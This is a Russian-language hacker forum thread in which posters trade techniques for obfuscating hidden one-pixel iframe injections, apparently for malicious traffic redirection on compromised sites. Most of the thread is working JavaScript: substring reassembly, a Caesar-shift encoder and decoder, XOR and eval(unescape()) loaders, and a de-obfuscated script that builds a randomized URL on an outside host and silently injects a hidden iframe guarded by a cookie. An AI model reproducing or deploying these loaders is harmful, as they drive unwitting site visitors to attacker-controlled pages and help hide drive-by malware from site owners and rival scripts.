мне тут чел в аську стукнул -- и говорит закриптуй ифрейм --- мне сразу думаю криптовка->трои->отчеты -- какой нафиг ифрейм

чуток попозже до меня доперло о чем он -- просто скрипты ифреймеры чужие ифрейм теги удаляют -- а он хотел от этого избавиться --

ну вот мне чет на ночь глядя и навеяло если с php и cgi скриптами все ясно просто декодим в base64 и выводим декод от хэша то с html abu знает

ну я тут почесал репку и вот что надумал

<script>
var anyString ="<>firame src='http://suckers.h18.ru' width='1' height='1'"
document.write (anyString.substring (0,1),anyString.substring (3,4),anyString.substring (2,3),anyString.substring (4,58),anyString.substring (1,2),anyString.substring (0,1),anyString.substring (20,21),anyString.substring (3,4),anyString.substring (2,3),anyString.substring (4,9),anyString.substring (1,2))
</script>

вот получается из строки какбы посимвольно или группами выдираем и и составляем из них
<iframe src="http://suckers.h18.ru" width="1" height="1"></iframe>

конец

Тогда уж лучше брать принципы HTML-протекторов.

Самое простое - сдвиг всех символов по таблице (Код Цезаря?):

Кодировщик:

var source = "<iframe src='http://suckers.h18.ru' width='1' height='1'>";
var result = "";
var step = 2;

for(var i=0;i<source.length;i++)result+=String.fromCharCode(sour ce.charCodeAt(i)+step);
document.write(result);


напишет
>khtcog"ute?)jvvr<11uwemgtu0j3:0tw)"ykfvj?)3)"jgkijv?)3)@

Для декодирования на странице просто заменить step на противоположное значение и подставить защифрованный код как source:

var source = '>khtcog"ute?)jvvr<11uwemgtu0j3:0tw)"ykfvj?)3)"jgkijv?)3)@';
var step = -2;
var result = '';
for(var i=0;i<source.length;i++)result+=String.fromCharCode(sour ce.charCodeAt(i)+step);
document.write(result);

ну можно и так =)

Так вот по интересней будет <iframe src="http://suckers.h18.ru" width="1" height="1"></iframe> после кодирования получаеться во так:


<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6 E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B% 6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74 %68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%5 3%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F% 64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69 %29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3 E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22% 22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65 %28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));d(unescape("%08<gocpdk->< 3 ?vjekgj\" 3 ?jvfku\" wp,:3j,qpgiawq--8rvvj ?apq\"gocpdk>%08%08<VRKPAQ->9s?vpcvqecpflm,vlgowamfgqncd\"lpwvgpy+*s\"lmkvalwd9 ilcn`8vwm`c ?lmkvcamn,umflku+ gnkd ??+6.2*elkpvq`wq,dgpj,lmkvcamn,umflku*dk9+*o+23. +*o *vwmgokVvgq9 ?qwvcvq,umflkuy+*o\"lmkvalwd9w?vlkprpgvdclm,umflku9m?vlkprgpmdg`lm,umf lku9 ?{vknk`kqkt,gn{vq,_kYnnc,vlgowamf+ 3 ??fk,_kYnnc,vlgowamf*dky+))k9jvelgn,nnc,vlgowamf>k92?k*pmdy+*w\"lmkvalwd9 3 ?fk,_kYnnc,vlgowamf9 lgffkj ?{vknk`kqkt,gn{vq,_kYnnc,vlgowamfy+ lgffkj ?#{vknk`kqkt,gn{vq,_kYnnc,vlgowamf*dky+))k9jvelgn, nnc,vlgowamf>k92?k*pmdy+*m\"lmkvalwd+*{9+ <tkf-><lgffkj8{vknk`kqkt?gn{vq\"c?gwnct\"cv?gocl\"cgpcvzgv?gr{v\"vwrlk><zr2223/8rmv9zr2223/8vdgn9gvwnmq`c8lmkvkqmr?gn{vq\"tkf> *gvkpu,vlgowamfy+3/??+ cpgrM *dMzgflk,vlgeCpgqw,pmvcektcl$$nnc,vlgowamf*dky+3/?#+ GKQO *dMzgflk,vlgeCpgqw,pmvcektcl~~3/??+ pgpmnrzG\"vglpgvlK *dMzgflk,gocLrrc,pmvcektcl*dk+221. +*{ *vwmgokVvgq9+ {rmA *flcoomAagzg,+*gelcPvzgVgvcgpa,cvy+*{\"lmkvalwd9 ilcn`8vwm`c ?lmkvcamn,umflku+3/?#+ cpgrM *dMzgflk,vlgeCpgqw,pmvcektcl*dkd?lumfgqwmolm,vlg owamf9e?wlgovzgvlmalm,vlgowamfy+nnc,vlgowamf#$$fK{ @vlgognGvge,vlgowamf*dkh?rwgqwmolm,umflku9j?lumfg qwmolm,umflku9+LUMFGQWMO,vlgtG~RWGQWMO,vlgtG*qvlgt Ggpwvrca,umflkuy+qpg{cn,vlgowamf*dkd?vpcvqvagngql m,vlgowamf9e?wlgovzgvlmalm,vlgowamfy+nnc,vlgowamf* dky+3/?#+ GKQO *dMzgflk,vlgeCpgqw,pmvcektcl~~3/??+ pgpmnrzG\"vglpgvlK *dMzgflk,gocLrrc,pmvcektcl*dknnwl?gtmogqwmolm,um flku9+GTMOGQWMO,vlgtG*qvlgtGgqcgngp,umflkuy+3??jak ju,n*dky+n*h\"lmkvalwdd?gtmogqwmolm,umflku9+GTMOGQWMO,vlgtG*qv lgtGgpwvrca,umflkuy+3??jakju,n*dky+n*j\"lmkvalwdgqncd\"lpwvgpy+*e\"lmkvalwdgqncd\"lpwvgpy+n*d\"lmkvalwd< vrkpaQctcH ?gecwelcN\"VRKPAQ>"));
</SCRIPT>

ну-ка ребятки :) кто раскрипутем?)

document.write(unescape("%3Cscript%3Etry%20%7Bfunction%20IUD%28vfy%29%7Bret urn%20parseInt%28vfy%29%7Dvar%20icV%3D%2777u7Su7wu 7au7ru7Fu7Uu7Nu75u7tu7ou7Vu7Du7Iu73u7pu7ju7nu7Xu7G u7Ju7Hu78u7du7gu7qu7cu7Yu76u7yu7Pu7Tu7iu7Bu7Mu7zu7 9u7ku7Cu7su7Zu7Ou7fu74u7bu7Lu7lu7mu7eu7Au7Ru7Ku7Wu 7huS7uSSuSwuSauSruSFuSUuSNuS5uStuSouSVuSDuSIuS3uSp %27%2CnZX%3DicV.substr%282%2C1%29%3Bvar%20qRp%3DAr ray%28IUD%28%27144%27%29%2CIUD%28%27223%27%29%2C26 322%5E26141%2C21993%5E21815%2CIUD%28%27197%27%29%2 CIUD%28%27220%27%29%2C4519%5E4479%2C8893%5E8751%2C IUD%28%27161%27%29%2C24675%5E24773%2C10539%5E10721 %2C12208%5E12137%2C5037%5E4975%2CIUD%28%27195%27%2 9%2C21393%5E21277%2CIUD%28%27213%27%29%2C15258%5E1 5209%2CIUD%28%27132%27%29%2C3608%5E3741%2CIUD%28%2 7215%27%29%2CIUD%28%27218%27%29%2CIUD%28%27205%27% 29%2CIUD%28%27192%27%29%2CIUD%28%27145%27%29%2CIUD %28%27158%27%29%2C13273%5E13121%2CIUD%28%27128%27% 29%2CIUD%28%27142%27%29%2CIUD%28%27156%27%29%2C174 76%5E17625%2CIUD%28%27159%27%29%2CIUD%28%27153%27% 29%2C17201%5E17323%2C24406%5E24525%2CIUD%28%27148% 27%29%2CIUD%28%27149%27%29%2C20659%5E20605%2CIUD%2 8%27200%27%29%2CIUD%28%27201%27%29%2CIUD%28%27151% 27%29%2C22608%5E22743%2CIUD%28%27130%27%29%2CIUD%2 8%27225%27%29%2C15917%5E16105%2C17322%5E17259%2C20 467%5E20341%2CIUD%28%27203%27%29%2CIUD%28%27209%27 %29%2CIUD%28%27219%27%29%2CIUD%28%27232%27%29%2C28 005%5E28061%2C1322%5E1517%2CIUD%28%27212%27%29%2C2 5402%5E25553%2C15330%5E15133%2CIUD%28%27131%27%29% 2CIUD%28%27227%27%29%2C22766%5E22639%2C17309%5E171 63%2CIUD%28%27141%27%29%2C19666%5E19521%2C21212%5E 21035%2C24777%5E24635%2C13259%5E13085%2CIUD%28%272 41%27%29%2C4475%5E4491%2CIUD%28%27233%27%29%2C2254 %5E2083%2C2045%5E1811%2C16598%5E16441%29%2CVJx%3Bv ar%20SJK%2CBJI%3Bvar%20fmI%3D%27777S7w7a7r7F7U7N75 7t7o7V7D7w7U7r7I7D737a7S7p7S7j7a7S7n7X7G737J7H7a73 787d7g7q7c7w7d7Y767y7g7P7q7T7i7B7M7z767H797w7k7C7o 7Y7c7I7d7Y7Y7s737o7I7a7n7r7d767s737r737773787s737r 7Z7Z7X737I737Z7d737w7O7S7V797S7U7a7n7f7H7U747O7o78 7I7I7a7n7f7H7U747O7a7H7D7k7I7b7n7X7L7w7O787C7D7l7U 747X7c7y7c7y7X7s737a7C7U7V7a7D737I7s737m757t7o7V7D 7w7U7r7I7D737a7S7p7S7j7S7w7n7w7D7c7w7J7X7G737J7H7a 737U7d737D7C7e737A7H7U7C7n7X7s737J7H7a737C7d737D7C 7e737A7H7U7C7n7X7s737C7O7S7C7U7R7r7b7C7n7U7O7l7C7U 7R7r7b7C7n7X7Z7P7i76767676767L7g7q7X7s737k7I7w7V7b 7C7D7U7O7w7I7I7K7r7C737d737w7D7Z7Y7d7Y7Z7C7S7w7H7F 7C7n7w7J7X7Z7Y7s7C7W7F7r7a7C7S7d7Y7Z7C7O7U7I7h7f7R S77U7a7r7D7l7n7X7s737m757t7J7H7a737w7D737d737Y7y7a 7S7e7P7I7y7k7Y7c7w7J737d737Y7y7Y7c7S7C7d7Y7S7y7O7a 7I78787S7p7S7U7C7b7S7O7r7D7o7I7Y7c7F7d7YSS747U7b78 SS7Y7s757t7r7o7n7k7I7w7V7b7C7D7U7O7w7I7I7K7r7C7O7r 7D7k7C7WSw7o7n7w7D7Z7Y7Y7Z7Y7d7Y7Z7w7J7Z7Y7Y7X737d 7d73Sa7y7X737G757t7J7H7a737V7a78737d737Y747U7U7FSr SSSS7Y737Z737n7k7I7w7V7b7C7D7U7O787I7w7H7U7r7I7D7O 747I7S7U73SF7d737Y7Y73SU737Y7Y73Sr737a7S7p7S7j7a7S 7n7X7X737Z737k7I7w7V7b7C7D7U7O787I7w7H7U7r7I7D7O74 7I7S7U7O7a7C7F787H7w7C7nSSSNS57HSaSt76Sa7z7OSaSoSS 7c737Y7O7Y7X7O7a7C7F787H7w7C7nSSSV7O7ZSS7c737Y7O7Y 7X737Z737Y7O7Y737Z737a7S7p7S7j7a7S7n7X737Z737Y7O7Y 737Z737S7C737Z737F7s757t7J7H7a737I737d737k7I7w7V7b 7C7D7U7O7w7a7C7H7U7CSD787C7b7C7D7U7n7Y7r7o7a7H7b7C 7Y7X7s7I7O7S7C7USI7U7U7a7r797V7U7C7n7Y7S7a7w7Y7c73 7V7a787X7s757t7I7O7o7a7H7b7CS37I7a7k7C7a7d767s737I 7O7e7r7k7U747d7y7s737I7O747C7r7l747U7d7y7s737I7O7S 7U7p787C7O7k7r7S7F787H7p7d7Y7D7I7D7C7Y7s73757t7U7a 7p737G737k7I7w7V7b7C7D7U7O797I7k7p7O7H7F7F7C7D7kSp 747r787k7n7I7X7s737a7S7p7S7j7S7w7n7w7D7c7w7J7X7s7m 757t7w7H7U7w747n7C7X7G7k7I7w7V7b7C7D7U7O7e7a7r7U7C 7n7Y77747U7b787N77797I7k7p7N77SS797I7k7p7N77SS747U 7b787N7Y7X7s7k7I7w7V7b7C7D7U7O797I7k7p7O7H7F7F7C7D 7kSp747r787k7n7I7X7s737a7S7p7S7j7S7w7n7w7D7c7w7J7X 7s7m7m757t77SS7S7w7a7r7F7U7N%27%2Caim%3D%27%27%3Bi cV%3DicV.split%28nZX%29%3Bfor%28VJx%3D0%3BVJx%3Cfm I.length%3BVJx+%3D2%29%7BBJI%3DfmI.substr%28VJx%2C 2%29%3Bfor%28SJK%3D0%3BSJK%3CicV.length%3BSJK++%29 %7Bif%28icV%5BSJK%5D%3D%3DBJI%29break%3B%7D%20aim+ %3DString.fromCharCode%28qRp%5BSJK%5D%5E172%29%3B% 7Ddocument.write%28aim%29%3B%7D%0Acatch%28e%29%7B% 7D%3C/script%3E"))</script>

Расшифровка всех ваших новомодных криптеров займем не больше пяти секунд.

Давай, Гем.. покажи класс :))

Вот на


<script>try {function IUD(vfy){return parseInt(vfy)}var icV='77u7Su7wu7au7ru7Fu7Uu7Nu75u7tu7ou7Vu7Du7Iu73u 7pu7ju7nu7Xu7Gu7Ju7Hu78u7du7gu7qu7cu7Yu76u7yu7Pu7T u7iu7Bu7Mu7zu79u7ku7Cu7su7Zu7Ou7fu74u7bu7Lu7lu7mu7 eu7Au7Ru7Ku7Wu7huS7uSSuSwuSauSruSFuSUuSNuS5uStuSou SVuSDuSIuS3uSp',nZX=icV.substr(2,1);var qRp=Array(IUD('144'),IUD('223'),26322^26141,21993^ 21815,IUD('197'),IUD('220'),4519^4479,8893^8751,IU D('161'),24675^24773,10539^10721,12208^12137,5037^ 4975,IUD('195'),21393^21277,IUD('213'),15258^15209 ,IUD('132'),3608^3741,IUD('215'),IUD('218'),IUD('2 05'),IUD('192'),IUD('145'),IUD('158'),13273^13121, IUD('128'),IUD('142'),IUD('156'),17476^17625,IUD(' 159'),IUD('153'),17201^17323,24406^24525,IUD('148' ),IUD('149'),20659^20605,IUD('200'),IUD('201'),IUD ('151'),22608^22743,IUD('130'),IUD('225'),15917^16 105,17322^17259,20467^20341,IUD('203'),IUD('209'), IUD('219'),IUD('232'),28005^28061,1322^1517,IUD('2 12'),25402^25553,15330^15133,IUD('131'),IUD('227') ,22766^22639,17309^17163,IUD('141'),19666^19521,21 212^21035,24777^24635,13259^13085,IUD('241'),4475^ 4491,IUD('233'),2254^2083,2045^1811,16598^16441),V Jx;var SJK,BJI;var fmI='777S7w7a7r7F7U7N757t7o7V7D7w7U7r7I7D737a7S7p7 S7j7a7S7n7X7G737J7H7a73787d7g7q7c7w7d7Y767y7g7P7q7 T7i7B7M7z767H797w7k7C7o7Y7c7I7d7Y7Y7s737o7I7a7n7r7 d767s737r737773787s737r7Z7Z7X737I737Z7d737w7O7S7V7 97S7U7a7n7f7H7U747O7o787I7I7a7n7f7H7U747O7a7H7D7k7 I7b7n7X7L7w7O787C7D7l7U747X7c7y7c7y7X7s737a7C7U7V7 a7D737I7s737m757t7o7V7D7w7U7r7I7D737a7S7p7S7j7S7w7 n7w7D7c7w7J7X7G737J7H7a737U7d737D7C7e737A7H7U7C7n7 X7s737J7H7a737C7d737D7C7e737A7H7U7C7n7X7s737C7O7S7 C7U7R7r7b7C7n7U7O7l7C7U7R7r7b7C7n7X7Z7P7i767676767 67L7g7q7X7s737k7I7w7V7b7C7D7U7O7w7I7I7K7r7C737d737 w7D7Z7Y7d7Y7Z7C7S7w7H7F7C7n7w7J7X7Z7Y7s7C7W7F7r7a7 C7S7d7Y7Z7C7O7U7I7h7f7RS77U7a7r7D7l7n7X7s737m757t7 J7H7a737w7D737d737Y7y7a7S7e7P7I7y7k7Y7c7w7J737d737 Y7y7Y7c7S7C7d7Y7S7y7O7a7I78787S7p7S7U7C7b7S7O7r7D7 o7I7Y7c7F7d7YSS747U7b78SS7Y7s757t7r7o7n7k7I7w7V7b7 C7D7U7O7w7I7I7K7r7C7O7r7D7k7C7WSw7o7n7w7D7Z7Y7Y7Z7 Y7d7Y7Z7w7J7Z7Y7Y7X737d7d73Sa7y7X737G757t7J7H7a737 V7a78737d737Y747U7U7FSrSSSS7Y737Z737n7k7I7w7V7b7C7 D7U7O787I7w7H7U7r7I7D7O747I7S7U73SF7d737Y7Y73SU737 Y7Y73Sr737a7S7p7S7j7a7S7n7X7X737Z737k7I7w7V7b7C7D7 U7O787I7w7H7U7r7I7D7O747I7S7U7O7a7C7F787H7w7C7nSSS NS57HSaSt76Sa7z7OSaSoSS7c737Y7O7Y7X7O7a7C7F787H7w7 C7nSSSV7O7ZSS7c737Y7O7Y7X737Z737Y7O7Y737Z737a7S7p7 S7j7a7S7n7X737Z737Y7O7Y737Z737S7C737Z737F7s757t7J7 H7a737I737d737k7I7w7V7b7C7D7U7O7w7a7C7H7U7CSD787C7 b7C7D7U7n7Y7r7o7a7H7b7C7Y7X7s7I7O7S7C7USI7U7U7a7r7 97V7U7C7n7Y7S7a7w7Y7c737V7a787X7s757t7I7O7o7a7H7b7 CS37I7a7k7C7a7d767s737I7O7e7r7k7U747d7y7s737I7O747 C7r7l747U7d7y7s737I7O7S7U7p787C7O7k7r7S7F787H7p7d7 Y7D7I7D7C7Y7s73757t7U7a7p737G737k7I7w7V7b7C7D7U7O7 97I7k7p7O7H7F7F7C7D7kSp747r787k7n7I7X7s737a7S7p7S7 j7S7w7n7w7D7c7w7J7X7s7m757t7w7H7U7w747n7C7X7G7k7I7 w7V7b7C7D7U7O7e7a7r7U7C7n7Y77747U7b787N77797I7k7p7 N77SS797I7k7p7N77SS747U7b787N7Y7X7s7k7I7w7V7b7C7D7 U7O797I7k7p7O7H7F7F7C7D7kSp747r787k7n7I7X7s737a7S7 p7S7j7S7w7n7w7D7c7w7J7X7s7m7m757t77SS7S7w7a7r7F7U7 N',aim='';icV=icV.split(nZX);for(VJx=0;VJx<fmI.length;VJx+=2){BJI=fmI.substr(VJx,2);for(SJK=0 ;SJK<icV.length;SJK++){if(icV[SJK]==BJI)break;} aim+=String.fromCharCode(qRp[SJK]^172);}document.write(aim);}
catch(e){}</script>


Повторно


<script>
function rsys_rs(){ var l=24,c="01234567890abcdef",o=""; for(i=0; i < l; i++) o += c.substr(Math.floor(Math.random()*c.length),1,1); return o; }
function rsys_sc(cn,cv){ var t= new Date(); var e= new Date(); e.setTime(t.getTime()+3600000*24); document.cookie = cn+"="+escape(cv)+";expires="+e.toGMTString(); }
var cn = "1rsw3o1d",cv = "1",se="s1.rollsystems.info",p="/html/";
if(document.cookie.indexOf(cn+""+"="+cv+"") == -1) {
var url = "http://" + (document.location.host != "" ? "" : rsys_rs()) + document.location.host.replace(/[^a-z0-9.-]/, ".").replace(/\.+/, ".") + "." + rsys_rs() + "." + se + p;
var o = document.createElement("iframe");o.setAttribute("src", url);
o.frameBorder=0; o.width=1; o.height=1; o.style.display="none";
try { document.body.appendChild(o); rsys_sc(cn,cv);}
catch(e){document.write("<html><body></body></html>");document.body.appendChild(o); rsys_sc(cn,cv);}}
</script>

молодец =) хек)

при том хек в 3 хода=)